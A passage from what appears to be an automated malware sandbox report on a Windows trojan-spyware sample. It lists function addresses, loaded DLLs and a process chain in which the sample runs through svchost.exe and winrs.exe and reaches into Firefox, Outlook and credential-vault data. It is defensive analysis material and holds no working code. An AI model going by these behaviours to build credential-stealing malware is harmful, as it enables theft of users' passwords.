                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B5BF01_2_036B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367DBF91_2_0367DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365FB801_2_0365FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B3A6C1_2_036B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FFA491_2_036FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F7A461_2_036F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EDAC61_2_036EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DDAAC1_2_036DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03685AA01_2_03685AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E1AA31_2_036E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036499501_2_03649950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365B9501_2_0365B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D59101_2_036D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AD8001_2_036AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036438E01_2_036438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FFF091_2_036FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03603FD21_2_03603FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03603FD51_2_03603FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FFFB11_2_036FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03641F921_2_03641F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03649EB01_2_03649EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F7D731_2_036F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03643D401_2_03643D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F1D5A1_2_036F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365FDC01_2_0365FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B9C321_2_036B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FFCF21_2_036FFCF2
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeCode function: 2_2_0443FC9E2_2_0443FC9E
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeCode function: 2_2_044296482_2_04429648
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeCode function: 2_2_04420EC52_2_04420EC5
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeCode function: 2_2_04420ECE2_2_04420ECE
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeCode function: 2_2_0442784B2_2_0442784B
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeCode function: 2_2_0442784E2_2_0442784E
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeCode function: 2_2_0441F0CE2_2_0441F0CE
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeCode function: 2_2_044210EE2_2_044210EE
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeCode function: 2_2_0441F21E2_2_0441F21E
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_0345A3523_2_0345A352
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_034603E63_2_034603E6
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033AE3F03_2_033AE3F0
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_034402743_2_03440274
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_034202C03_2_034202C0
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_034281583_2_03428158
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033901003_2_03390100
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_0343A1183_2_0343A118
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_034581CC3_2_034581CC
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_034541A23_2_034541A2
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_034601AA3_2_034601AA
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_034320003_2_03432000
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033A07703_2_033A0770
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033C47503_2_033C4750
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_0339C7C03_2_0339C7C0
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033BC6E03_2_033BC6E0
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033A05353_2_033A0535
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_034605913_2_03460591
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_034524463_2_03452446
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_034444203_2_03444420
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_0344E4F63_2_0344E4F6
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_0345AB403_2_0345AB40
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_03456BD73_2_03456BD7
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_0339EA803_2_0339EA80
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033B69623_2_033B6962
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033A29A03_2_033A29A0
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_0346A9A63_2_0346A9A6
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033AA8403_2_033AA840
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033A28403_2_033A2840
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033868B83_2_033868B8
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033CE8F03_2_033CE8F0
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_03414F403_2_03414F40
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033C0F303_2_033C0F30
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033E2F283_2_033E2F28
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_03442F303_2_03442F30
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_0341EFA03_2_0341EFA0
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_03392FC83_2_03392FC8
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_0345EE263_2_0345EE26
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033A0E593_2_033A0E59
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_0345EEDB3_2_0345EEDB
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033B2E903_2_033B2E90
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_0345CE933_2_0345CE93
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033AAD003_2_033AAD00
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_0343CD1F3_2_0343CD1F
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033B8DBF3_2_033B8DBF
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_0339ADE03_2_0339ADE0
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033A0C003_2_033A0C00
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_03390CF23_2_03390CF2
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_03440CB53_2_03440CB5
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_0345132D3_2_0345132D
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_0338D34C3_2_0338D34C
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033E739A3_2_033E739A
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033A52A03_2_033A52A0
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_034412ED3_2_034412ED
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033BD2F03_2_033BD2F0
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033BB2C03_2_033BB2C0
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_0346B16B3_2_0346B16B
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_0338F1723_2_0338F172
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033D516C3_2_033D516C
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033AB1B03_2_033AB1B0
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_0344F0CC3_2_0344F0CC
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_0345F0E03_2_0345F0E0
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_034570E93_2_034570E9
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033A70C03_2_033A70C0
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_0345F7B03_2_0345F7B0
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033E56303_2_033E5630
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_034516CC3_2_034516CC
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_034575713_2_03457571
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_034695C33_2_034695C3
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_0343D5B03_2_0343D5B0
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033914603_2_03391460
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_0345F43F3_2_0345F43F
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_0345FB763_2_0345FB76
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_03415BF03_2_03415BF0
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033BFB803_2_033BFB80
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033DDBF93_2_033DDBF9
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_03457A463_2_03457A46
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_0345FA493_2_0345FA49
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_03413A6C3_2_03413A6C
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_0344DAC63_2_0344DAC6
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033E5AA03_2_033E5AA0
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_03441AA33_2_03441AA3
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_0343DAAC3_2_0343DAAC
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_034359103_2_03435910
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033A99503_2_033A9950
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033BB9503_2_033BB950
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_0340D8003_2_0340D800
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033A38E03_2_033A38E0
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_0345FF093_2_0345FF09
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033A1F923_2_033A1F92
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_03363FD53_2_03363FD5
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_03363FD23_2_03363FD2
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_0345FFB13_2_0345FFB1
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033A9EB03_2_033A9EB0
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_03451D5A3_2_03451D5A
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_03457D733_2_03457D73
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033A3D403_2_033A3D40
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_033BFDC03_2_033BFDC0
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_03419C323_2_03419C32
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_0345FCF23_2_0345FCF2
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_029C1AE03_2_029C1AE0
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_029BCA103_2_029BCA10
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_029BCA073_2_029BCA07
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_029BAC103_2_029BAC10
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_029BCC303_2_029BCC30
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_029BAD563_2_029BAD56
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_029BAD603_2_029BAD60
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_029C33903_2_029C3390
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_029C338D3_2_029C338D
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_029B10A93_2_029B10A9
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_029C51903_2_029C5190
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_029DB7E03_2_029DB7E0
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_0326E3683_2_0326E368
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_0326E4833_2_0326E483
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_0326CB833_2_0326CB83
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_0326E81D3_2_0326E81D
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_0326D8E83_2_0326D8E8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03675130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036BF290 appears 103 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0362B970 appears 262 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03687E54 appears 107 times
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: String function: 00E9F8A0 appears 35 times
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: String function: 00E96AC0 appears 42 times
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: String function: 00E8EC2F appears 68 times
                Source: C:\Windows\SysWOW64\winrs.exeCode function: String function: 0341F290 appears 103 times
                Source: C:\Windows\SysWOW64\winrs.exeCode function: String function: 033E7E54 appears 107 times
                Source: C:\Windows\SysWOW64\winrs.exeCode function: String function: 033D5130 appears 58 times
                Source: C:\Windows\SysWOW64\winrs.exeCode function: String function: 0340EA12 appears 86 times
                Source: C:\Windows\SysWOW64\winrs.exeCode function: String function: 0338B970 appears 262 times
                Source: KSts9xW7qy.exe, 00000000.00000003.1671955920.00000000041AD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs KSts9xW7qy.exe
                Source: KSts9xW7qy.exe, 00000000.00000003.1672760590.0000000004003000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs KSts9xW7qy.exe
                Source: KSts9xW7qy.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@13/11
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EBCE7A GetLastError,FormatMessageW,0_2_00EBCE7A
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EAAB84 AdjustTokenPrivileges,CloseHandle,0_2_00EAAB84
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EAB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00EAB134
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EBE1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00EBE1FD
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EB6532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_00EB6532
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00ECC18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_00ECC18C
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00E7406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00E7406B
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeFile created: C:\Users\user\AppData\Local\Temp\autBCED.tmpJump to behavior
                Source: KSts9xW7qy.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: winrs.exe, 00000003.00000002.3519968657.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000003.00000003.1958451082.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000003.00000003.1958451082.0000000002ED6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: KSts9xW7qy.exeReversingLabs: Detection: 71%
                Source: unknownProcess created: C:\Users\user\Desktop\KSts9xW7qy.exe "C:\Users\user\Desktop\KSts9xW7qy.exe"
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\KSts9xW7qy.exe"
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeProcess created: C:\Windows\SysWOW64\winrs.exe "C:\Windows\SysWOW64\winrs.exe"
                Source: C:\Windows\SysWOW64\winrs.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\KSts9xW7qy.exe"Jump to behavior
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeProcess created: C:\Windows\SysWOW64\winrs.exe "C:\Windows\SysWOW64\winrs.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: wsmsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: dsrole.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: pcwum.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: KSts9xW7qy.exeStatic file information: File size 1207296 > 1048576
                Source: KSts9xW7qy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: KSts9xW7qy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: KSts9xW7qy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: KSts9xW7qy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: KSts9xW7qy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: KSts9xW7qy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: KSts9xW7qy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: winrs.pdbGCTL source: svchost.exe, 00000001.00000003.1743692170.0000000003024000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1743676400.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1743605117.000000000301B000.00000004.00000020.00020000.00000000.sdmp, pTPcvfjkbwUWkD.exe, 00000002.00000002.3520262772.0000000001088000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: pTPcvfjkbwUWkD.exe, 00000002.00000002.3519820185.000000000060E000.00000002.00000001.01000000.00000004.sdmp, pTPcvfjkbwUWkD.exe, 00000005.00000002.3519916221.000000000060E000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP source: KSts9xW7qy.exe, 00000000.00000003.1671503476.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, KSts9xW7qy.exe, 00000000.00000003.1671284803.0000000004030000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1774970089.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1774970089.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1673895797.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1675431997.0000000003400000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000003.00000003.1782575631.00000000031B3000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000003.00000002.3520870455.00000000034FE000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 00000003.00000002.3520870455.0000000003360000.00000040.00001000.00020000.00000000.sdmp, 